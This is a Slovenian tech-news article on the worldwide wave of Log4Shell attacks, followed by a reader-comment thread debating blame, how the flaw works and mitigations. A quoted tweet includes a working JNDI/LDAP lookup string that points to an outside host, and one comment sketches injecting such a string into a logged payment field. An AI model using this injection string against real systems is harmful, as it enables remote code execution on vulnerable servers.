» »

Napadi Log4Shell so preplavili svet

Napadi Log4Shell so preplavili svet

Slo-Tech - Poskusi zlorabe ranljivosti v knjižnici Log4j, ki so jo razkrili prejšnji teden, so se v zadnjih dneh močno okrepili, saj varnostna podjetja beležijo prek sto napadov na minuto.

Pretekli petek je bila objavljena huda ranljivost v Apachejevi javanski knjižnici za dnevniško beleženje Log4j, ki napadalcu omogoča izvajanje poljubne kode na daljavo. Problem je dvojen; kot prvo to odprtokodno knjižnico uporablja desetine milijonov računalnikov po svetu, saj je bila zgolj v zadnjih štirih mesecih z javnih repozitorijev pretočena 84-milijonkrat. Med uporabniki so tudi velika informacijska podjetja, kot so Amazon, Cisco, Oracle, Microsoft in IBM. In drugič: zloraba ranljivosti je nadvse enostavna, saj je dovolj, da se sistemu v beleženje vsili določeno zaporedje znakov. To pa pomeni, da jo je preprosto avtomatizirati in v dneh po objavi je število tovrstnih napadov res skokovito naraslo.

V varnostnem podjetju Check Point pravijo, da zaznavajo čez sto napadov na minuto in tudi v Sophosu so dejali, da jih je bilo doslej že več sto tisoč. Zlikovci so oblikovali že več kot 60 izpopolnjenih izvedenk, ponavadi v povezavi z zlobno kodo za rudarjenje kriptovalut ali nabiranje zombi računalnikov za botnete. Tako svoje različice že poznajo najbolj razvpiti botneti, tudi za Linux, kot sta Mirai in Muhstik (Tsunami), pa kriptorudarska koda XMRig za pridobivanje Monera. Večina napadov naj bi prihajala iz Rusije, Kitajske in ZDA, zaenkrat pa poskusi zlorab sodijo pretežno v tri kategorije - poleg omenjenih kriptorudarske in botnetov večina preostanka odpade na avtomatizirano iskanje lukenj za morebitne naprednejše napade, verjetno z ransomwarom. Zato se sluti, da je to šele uvertura in nas odmevnejši podvigi nevarnejših kriminalnih združb še čakajo. Po drugi strani pa zaenkrat večjih vdorov v vidnejša podjetja po tem kanalu še ni bilo na spregled.

Pri Cloudflaru so sicer navrgli, da ranljivost poznajo že od 1. decembra, ko so zaznali tudi prve zlorabe, a je število teh zares poskočilo šele po objavi. Ameriška državna agencija za kibernetsko obrambo CISA se je problemu posvetila z lastno kampanjo in zveznim organom zaukazala, da morajo vse luknje zakrpati do božiča. To se nemara sliši enostavno, toda treba je vedeti, da je zaradi lahkotne rabe takšnega programja včasih v kakšnem računalniku nameščeno, ne da bi se sistemski inženirji tega zavedali. Krivda za polomijo je sicer bržkone deljena; po eni plati gre za slabo spisano kodo v sami knjižnici, po drugi plati pa si mnogo njenih uporabnikov verjetno ni prebralo navodilTM in tako sploh niso vedeli, da je mogoče skoznjo prožiti tako pomembne ukaze - ki za dnevniško programje niso ravno običajna funkcija.

V Sloveniji je včeraj Urad vlade za informacijsko varnost razglasil povečano stopnjo ogroženosti. Glede na to, da je ranljivo skoraj vse kar vsaj od daleč diši po Javi, pa nas čaka zanimivih nekaj tednov.

39 komentarjev

Wrop ::

Človek ne ve ali bi se smejal ali jokal. Itak, da večina ne gre brati navodil neke dnevniško-logirne knjižnice, ki naj bi izpisovala zadeve v neko datoteko ali bazo in morda v event logger.
Kdo pa pričakuje, da se bo ob pravem nizu šla v resnici pobrati kaka java koda iz oddaljenega računalnika in jo celo šla izvajati.
To je čisto šalabajzerstvo s strani piscev knjižnice.
Kdo bo vse to pokrpal je sedaj vprašanje in kje se vse to nahaja? Se pa ta knjižnica na veliko uporablja, ker kadarkoli rabiš kaj (prilagodljivega) izpisat v dvevnik si uporabil log4j.
Zgleda kar velika pizdarija.

mitkos ::

Kaj to pomeni za navadnega uporabnika? A ta Log4J je program, ki si ga namestiš, za neko spremljanje nečesa in ti potem piše log-e ali je to del Windowsa, kakšnega drugega programa? Kako preveriti svoj računalnik če je ranljiv?

sbawe64 ::

2020 is new 1984
Corona World order

MrStein ::

mitkos je izjavil:

Kaj to pomeni za navadnega uporabnika? A ta Log4J je program, ki si ga namestiš, za neko spremljanje nečesa in ti potem piše log-e ali je to del Windowsa, kakšnega drugega programa? Kako preveriti svoj računalnik če je ranljiv?

Ranljivi so načeloma serverji.
Se pa zna zgoditi, da je kaj tudi na klientu.
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!

jebitese ::

Z zadnjim stavkom "je ranljivo skoraj vse kar vsaj od daleč diši po Javi", se pa kar strinjam.

mr_chai ::

mitkos je izjavil:

Kaj to pomeni za navadnega uporabnika? A ta Log4J je program, ki si ga namestiš, za neko spremljanje nečesa in ti potem piše log-e ali je to del Windowsa, kakšnega drugega programa? Kako preveriti svoj računalnik če je ranljiv?


Na zalednih sistemih je na JVM-ju na veliko v uporabi Log4j knjižnica, ki omogoča aplikacijam logiranje v tekstovne datoteke. Logira se pa poljubno več stvari, načeloma requesti, klici funkcij/metod itd, beleži se tudi errorje itd.. Vse to pomaga razvijalcem in skrbnikom zalednih sistemov, da vidijo stanje izvajanja aplikacije v tekstovnih datotekah. Upam, da sem dovolj preprosto razložil.

Tvoj računalnik najverjetneje ni ranljiv, razen če ne laufaš kakšen javanski server ala tomcat, websphere, jetty, weblogic, jboss in imaš odprto eksterno povezavo do tega serverja (če lahko nekdo zunaj tvoje mreže pošilja requeste na tvoj lokalni server).

srnjak ::

jebitese je izjavil:

Z zadnjim stavkom "je ranljivo skoraj vse kar vsaj od daleč diši po Javi", se pa kar strinjam.

Jaz pa ne.

pegasus ::

Maximus ::

Wrop je izjavil:


To je čisto šalabajzerstvo s strani piscev knjižnice.


Lahko da je, lahko da ni. Kolikor sem zasledil sta knjižnico spisala dva avtorja v svojem prostem času. Kjer večjo težavo vidim, so kompanije vredne miljone evrov in ki prodajajo svoje produkte za visoke zneske uporabile to in podobne open-source knjižnice brez validacije ali pa prispevanja nazaj OpenSource skupnosti.

Kje sedaj večji problem, v avtorju/ema ali multimiljonskih firmah?

antonija ::

Statistically 3 out of 4 involved usually enjoy gang-bang experience.

Zgodovina sprememb…

  • spremenilo: antonija ()

kow ::

Odlicna zadeva. Vsi bodo popatchali aplikacije, potem pa se bomo druzno pohvalili kako smo "resili" svet. Bozicno nakupovanje se bo neprekinjeno nadaljevalo. Success story!

slitkx ::

Vsak šef, ki je v svoji organizaciji dopustil nepokrpanost, bi moral biti odpuščen oz. bi moral odstopiti.
V idealnem svetu ...

Zgodovina sprememb…

  • spremenil: slitkx ()

darkolord ::

V idealnem svetu tudi ne bi bilo breaking changes v vsaki drugi minor verziji librarijev.

Zgodovina sprememb…

  • spremenilo: darkolord ()

naruto1 ::

slitkx je izjavil:

Vsak šef, ki je v svoji organizaciji dopustil nepokrpanost, bi moral biti odpuščen oz. bi moral odstopiti.
V idealnem svetu ...


Sefu dol visi za pokrpanost, samo release date mu je vazen. Zato pa je ves software postal crap.

antonija je izjavil:

https://xkcd.com/2347/



So true...

Zgodovina sprememb…

  • spremenilo: naruto1 ()

Wrop ::

Maximus je izjavil:

Wrop je izjavil:


To je čisto šalabajzerstvo s strani piscev knjižnice.


Lahko da je, lahko da ni. Kolikor sem zasledil sta knjižnico spisala dva avtorja v svojem prostem času. Kjer večjo težavo vidim, so kompanije vredne miljone evrov in ki prodajajo svoje produkte za visoke zneske uporabile to in podobne open-source knjižnice brez validacije ali pa prispevanja nazaj OpenSource skupnosti.

Kje sedaj večji problem, v avtorju/ema ali multimiljonskih firmah?


Mogoče začetke knižnice. Sedaj je vsaj 10 članov + neimenovano število ljudi, ki dajajo predloge in pišejo popravke, ki jih nato člani lahko vklučuejo v kodo.
Kaj imajo multimilijonske firme tu zraven? Knjižnica je bila na voljo vsem, sedaj bodo sicer morale ves drek same pojesti. In tega bo kar veliko. Sicer kaj ti v tem primeru pomaga, če zadevo preveriš, da v tvojem primeru zadeva deluje, ne moreš pa preveriti ali v vseh vnosnih podatkih zadeva gre brez problema skozi. Sicer nisem šel brati dokumentacije APIja, ampak tam sem prepričan, da ni pisalo, da se bodo podatki, ki jih hočeš izpisati v nek dnevnik, še dodatno preverjalo ali vsebujejo kakšen določen niz, ki ti lahko posledično prenese neko izvajalno kodo iz bog ve kje, pa povrhu vsega ti loger še to kodo izvede.
Kdo je kriv? Tu so vsekakor bolj avtorji. Multimilijonske firme bodo zmetale denar v novo knjižnico, problem pri malih se bo vlekel še neznano dolgo naprej.

Tatamata ::

Zelo dobro napisano. Tezave tako na Windows kot Linux serverjih.


mr_chai je izjavil:

mitkos je izjavil:

Kaj to pomeni za navadnega uporabnika? A ta Log4J je program, ki si ga namestiš, za neko spremljanje nečesa in ti potem piše log-e ali je to del Windowsa, kakšnega drugega programa? Kako preveriti svoj računalnik če je ranljiv?


Na zalednih sistemih je na JVM-ju na veliko v uporabi Log4j knjižnica, ki omogoča aplikacijam logiranje v tekstovne datoteke. Logira se pa poljubno več stvari, načeloma requesti, klici funkcij/metod itd, beleži se tudi errorje itd.. Vse to pomaga razvijalcem in skrbnikom zalednih sistemov, da vidijo stanje izvajanja aplikacije v tekstovnih datotekah. Upam, da sem dovolj preprosto razložil.

Tvoj računalnik najverjetneje ni ranljiv, razen če ne laufaš kakšen javanski server ala tomcat, websphere, jetty, weblogic, jboss in imaš odprto eksterno povezavo do tega serverja (če lahko nekdo zunaj tvoje mreže pošilja requeste na tvoj lokalni server).

Spura ::

srnjak je izjavil:

jebitese je izjavil:

Z zadnjim stavkom "je ranljivo skoraj vse kar vsaj od daleč diši po Javi", se pa kar strinjam.

Jaz pa ne.

Tudi jaz se ne. Zelo malo sistemov poznam, kjer bi se log4j2 uporabljal. Poleg tega poglej linkan page, vecina pise "Not vuln".

JeBelaCesta ::

ali zadošča če se samo blokira izhodni ldap protokol ?
lep pozdrav iz višav ;-)

||_^_|| ::

Se opravičujem za neznanje, ampak mar ne bi morala biti odprta koda odporna na takšne stvari?

mr_chai ::

||_^_|| je izjavil:

Se opravičujem za neznanje, ampak mar ne bi morala biti odprta koda odporna na takšne stvari?


Ne vem zakaj bi bila. Odprte kode je ogromno. Ljudi, ki bi pa vse to vzdrževali, pa je premalo.

jsmith ::

JeBelaCesta je izjavil:

ali zadošča če se samo blokira izhodni ldap protokol ?

LDAP je načeloma trenutno najbolj nevaren, vendar jndi podpira tudi druge protokole, naprimer dns.

Najbolje je posodobiti knjižnico log4j oziroma vsaj nastaviti parameter "-Dlog4j2.formatMsgNoLookups=true" ob zagonu ali v konfiguraciji.

jsmith ::

||_^_|| je izjavil:

Se opravičujem za neznanje, ampak mar ne bi morala biti odprta koda odporna na takšne stvari?

V teoriji je, v praksi pa se z mnogimi programi nihče ne ukvarja, dokler ni težav. Nekatera podjetja in EU sicer sofinancirajo varnostne preglede pogosto uporabljanih odprtokodnih rešitev.

Log4j is an open source project based on the work of many authors. It allows the developer to control which log statements are output with arbitrary granularity. It is fully configurable at runtime using external configuration files. Best of all, log4j has a gentle learning curve. Beware: judging from user feedback, it is also quite addictive.


This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage.

"I work on Log4j in my spare time"
"always dreamed of working on open source full time"
"3 sponsors are funding @rgoers's work: Michael, Glenn, Matt"

People, what are we doing.

— Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) December 10, 2021

antonija ::

Wrop je izjavil:

Kdo je kriv? Tu so vsekakor bolj avtorji. Multimilijonske firme bodo zmetale denar v novo knjižnico, problem pri malih se bo vlekel še neznano dolgo naprej.
Avtor je kriv za bug v kodi. In verjetno ni nikogar silil v uporabo buggaste kode, drugi so jo uporabili ker je bilo ceneje/lazje.

Firme so krive da so uporabile buggasto kodo in si naredile skodo. Zdaj bojo placale za svojo sparovnost.

Uporbaniki so krivi da so postavili buggast server. Zdaj bojo placali za svojo lenobo/komfort.

Itd.
Statistically 3 out of 4 involved usually enjoy gang-bang experience.

Invictus ::

BTW. zakaj imate komponente, ki logirajo nekaj, sploh na internetu?
"Life is hard; it's even harder when you're stupid."

http://goo.gl/2YuS2x

pegasus ::

antonija je izjavil:

Avtor je kriv za bug v kodi.
Ma kakšen bug no ... ni še nihče pogledal, za kaj se gre? Tu ni nobenega buga, vse deluje tako kot je zamišljeno in dokumentirano, nekdo je zgolj prebral dokumentacijo in sestavil skupaj tri odstavke iz treh različnih delov dokumentacije ...

antonija ::

My bad, feature.
Statistically 3 out of 4 involved usually enjoy gang-bang experience.

Wrop ::

Jaz temu ne bi ravno rekel bug. Navsezadnje zadeva deluje, samo ne na način, kot si je do sedaj predstavljala večina uporabnikov te knjižnice.
Zato pa taka panika, ker loger na privzet način ne izpisuje zadeve brez dodatne obdelave v nek dnevnik, kar bi se pričakovalo in kakor je tudi pisalo v dokumentaciji.
Firme niso same šle uporabljati knjižnico, ampak to delajo razvijalci. Normalno, da se uporablja knjižnice brez, da vsebino pregleduje na desetine razvijalcev ali pa pišejo enako funkcionalnost na novo, ker s tem dobiš nove hrošče ali pa varnostne luknje. Knjižnico uporablja tako razvijalec v googlu ali pa razvijalec za svoj hobi program. Oba pričakujeta, da ti logger ne bo šel pobirati neko kodo iz spleta in ti jo izvedel, če se pojavi nek niz v nizu, ki ga hočeš samo nekam izpisati.

antonija ::

Wrop je izjavil:

Firme niso same šle uporabljati knjižnico, ampak to delajo razvijalci. Normalno, da se uporablja knjižnice brez, da vsebino pregleduje na desetine razvijalcev ali pa pišejo enako funkcionalnost na novo, ker s tem dobiš nove hrošče ali pa varnostne luknje. Knjižnico uporablja tako razvijalec v googlu ali pa razvijalec za svoj hobi program. Oba pričakujeta, da ti logger ne bo šel pobirati neko kodo iz spleta in ti jo izvedel, če se pojavi nek niz v nizu, ki ga hočeš samo nekam izpisati.
Seveda niso preverjale; preverjanje kosta, traja cisto prevec casa, zamori zaposlene, pa se ucinkovitost preverjanja je lahko vpralsjiva. Navsezadnje firme obstajajo izkljucno zato da delajo dobicek, ki ga je treba maksimizirati kjer se le da.
Ampak to prinasa tudi tveganja, ki so se v tem primeru zelo lepo manifestirala.

Avtor kode tega verjetno ni naredil iz zlobe, ce prav razumem je pac pustil stringe v prvotni obliki ker je verjetno zanj bilo to povsem sprejemljivo. Knjiznjice verjetno ni pisal v sklopu narocila od googla, amazona, itd., ampak ker je "nekaj rabil". Je pa dodal opcijo, da koda ne spusti vsake packarije naprej in jo ustrezno dokumentiral.

Firme tudi niso iz zlehtnobe oz. mastermind nacrta "to rule the world" uporabile kodo brez da bi preverile kaj sploh pocne. Povsod je treba sparat, vsi so pod pritiskom da je treba vse narest hitreje in ceneje, kvaliteta pa zaradi tega pac trpi in tveganja se povecujejo. Hkrati ko so racunali prihranke bi morlai racunati tudi morebitne izgube, upam da so jih.

Domaci uporabniki s(m)o pa povecini glupi, vsaj ko pride do tehničnih detajlov. Nimamo ne volje, ne casa, in vecinoma tudi ne znanja da bi preverjali, kaj tocno nek paketek z nevemkoliko knjiznjicami dela, sploh pa ne bomo sli brat dokumentacija za vsako j....o knjiznjico. Paketek dela? Super. Komfort da ni vecjega; minimalen trud in "delujoc" izdelek. Ampak vse ima svojo ceno, in stvari za katere najmanj placamo (v denarju, casu ali zivcih) nas na koncu najvec kostajo.

Navsezadnje velja rek da "Blame is for little kids and gods, rest of us have to deal with consequences." Vseeno je kdo je kriv, ce je tvoj server zdaj zombie za naslednji botnet napad ali pa suzenj v farmi imaginarnih kovancev. Delo imas za narest in stroske za placat, pa ce se le da kaj naucit za naprej.
Statistically 3 out of 4 involved usually enjoy gang-bang experience.

l0g1t3ch ::

pegasus je izjavil:

antonija je izjavil:

Avtor je kriv za bug v kodi.
Ma kakšen bug no ... ni še nihče pogledal, za kaj se gre? Tu ni nobenega buga, vse deluje tako kot je zamišljeno in dokumentirano, nekdo je zgolj prebral dokumentacijo in sestavil skupaj tri odstavke iz treh različnih delov dokumentacije ...


Striktno gledano res ni bug.
Je pa zelo glupa privzeta konfiguracija, da gre interpretirat nek string in vlečt zadeve iz neta.

darkolord ::

Invictus je izjavil:

BTW. zakaj imate komponente, ki logirajo nekaj, sploh na internetu?
Se šališ?

njyngs ::

darkolord je izjavil:

Invictus je izjavil:

BTW. zakaj imate komponente, ki logirajo nekaj, sploh na internetu?
Se šališ?

Kaj pa pričakuješ od enega SAP-ovca?

Invictus ::

darkolord je izjavil:

Invictus je izjavil:

BTW. zakaj imate komponente, ki logirajo nekaj, sploh na internetu?
Se šališ?

Ne, se niti ne.

Tole zdaj so konkretno napihnili zadevo...

1. Kako lahko nekdo sploh izvede nekaj lastne kode na tvojem serverju? In podturi to zlobno kodo? Če mora pisati v log file?
2. Kako mu to koristi, če server ne komunicira z zunanjim svetom? Ajde, nekaj interne škode lahko naredi.
3. Kako je lahko sploh prišel do tega, da nekaj izvede znotraj varovane infrastrukture? Na pravilkno skonfiguriuranih sistemih sploh nimaš execute pravic, razen zapar kosov softwara.

Ja, nekdo z internim znanjem infrastrukture lahko naredi sranje. Kak čisto tretji, ob pravem varovanju, nima kaj narediti, saj sploh nima dostopov do sistemov.

Sicer folku dela domišljija iz filmov, ampak to se lahko zgodi samo pri glupih informatikih, ki nimajo pojma o varnosti...

Kot sem rekel, prenapihnjeno...

njyngs je izjavil:

darkolord je izjavil:

Invictus je izjavil:

BTW. zakaj imate komponente, ki logirajo nekaj, sploh na internetu?
Se šališ?

Kaj pa pričakuješ od enega SAP-ovca?

Kaj pa web developer we o varnosti ?!?!? Misli, da je username:password kombinacija sveta...
"Life is hard; it's even harder when you're stupid."

http://goo.gl/2YuS2x

Zgodovina sprememb…

  • spremenil: Invictus ()

njyngs ::

Haha, web developer baje :)) Si poskušal užalit, pa si tako mimo kresnil, da se mi kar rit smeje :))

Invictus ::

Tako ti ti mene s SAPom >:D.
"Life is hard; it's even harder when you're stupid."

http://goo.gl/2YuS2x

celebro ::

Sicer nisem java developer, ampak če jaz približno prav razumem to ranljivost ...

Invictus je izjavil:

BTW. zakaj imate komponente, ki logirajo nekaj, sploh na internetu?

Za web serverje še nisi slišal? Če imaš java web server in ta server naredi nekaj tako banalnega kot logira url za trenuten page ki ga procesira, potem bo ob uporabi log4j "featureja" in ustreznega urlja ta server lahko izvedel poljubno java kodo ki jo servira napadalec.

Invictus je izjavil:


Tole zdaj so konkretno napihnili zadevo...

1. Kako lahko nekdo sploh izvede nekaj lastne kode na tvojem serverju? In podturi to zlobno kodo? Če mora pisati v log file?

Ne rabi napadelec pisat v log file, tvoj server piše v log file. Napadalec mora samo poiskat kako lahko tvojemu serverju pošlje ustrezno oblikovan string, ki ga bo server zapisal.

Invictus je izjavil:

2. Kako mu to koristi, če server ne komunicira z zunanjim svetom? Ajde, nekaj interne škode lahko naredi.

Tvoj server ni direktno izpostavljen internetu? Nič hudega. Mogoče tvoj server enkrat na dan procesira statistiko uporabnikov in izpiše npr. "Processing user Invictus". Če se ustrezno preimenuješ in server lahko dela requeste na internet (mogoče pošilja statistiko na nek drug API preko interneta, pa SA ni zaklenil firewall na točno tist API), potem bo tvoj server spet lahko začel izvajat poljubno kodo.

Invictus je izjavil:

3. Kako je lahko sploh prišel do tega, da nekaj izvede znotraj varovane infrastrukture? Na pravilkno skonfiguriuranih sistemih sploh nimaš execute pravic, razen zapar kosov softwara.

Mislim da se napadalčeva koda izvaja znotraj procesorja serverja ki piše v log. Imaš server v banki, ki dvakrat na dan procesira plačila? Napadalec v polje 'namen' vpiše svoj attack string, server ga zalogira, in začne izvajat napadalčevo kodo. Kaj bo naredil? Ker ima tvoj server za normalno delovanje dostop do strežnikov drugih bank za procesiranje plačil, ima zdaj napadalec dostop do teh istih strežnikov, z vsemi pravicami ki so vezane na proces tvojega serverja.

Invictus ::

Saj bi odgovoril, pa ne bom nekomu, ki nima pojma o infrastrukturi in preveč gleda hackerske filme >:D ...
"Life is hard; it's even harder when you're stupid."

http://goo.gl/2YuS2x

bajker ::


Tole odlično razloži zadevo.
Res gre za "feature", a je tako nevaren, kot bi ga napisala NSA.

Mr.B ::

bajker je izjavil:


Tole odlično razloži zadevo.
Res gre za "feature", a je tako nevaren, kot bi ga napisala NSA.

Vidiš bug so prijavili Kitajci.. čez 2 tedna pa so sankcije nad znanstvene ustanove 8-)
France Rejects Genocide Accusations Against Israel in Gaza,
To accuse the Jewish state of genocide is to cross a moral threshold

win64 ::

Seveda je bug ali pa totalno slab dizajn.
Pri beleženju tipično v naprej določiš template niza. Primer: {Date} {IPAddress}: {Message}
Sistem za beleženje zamenja značke ({Date},{Message}...) s pravimi vrednostmi in tukaj je konec obdelava niza.

V tem primeru pa je neki tretji osebi(knjižnici, web uporabniku..) dovoljeno vriniti nekaj v template.
Analogija s sprintf(userMessage, "") - v tem primeru lahko uporabnik povzroči marsikaj.


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

Tudi Apple toži NSO Group

Oddelek: Novice / Tožbe
258232 (4824) sbawe64
»

Napadi Log4Shell so preplavili svet

Oddelek: Novice / Varnost
3912360 (8432) win64
»

Huda ranljivost v knjižnici Apache Log4j se že izrablja

Oddelek: Novice / Varnost
2210825 (7442) Ales
»

Varnostne ranljivosti v DSP vezju čipa Snapdragon

Oddelek: Novice / Varnost
74966 (2315) FireSnake

Več podobnih tem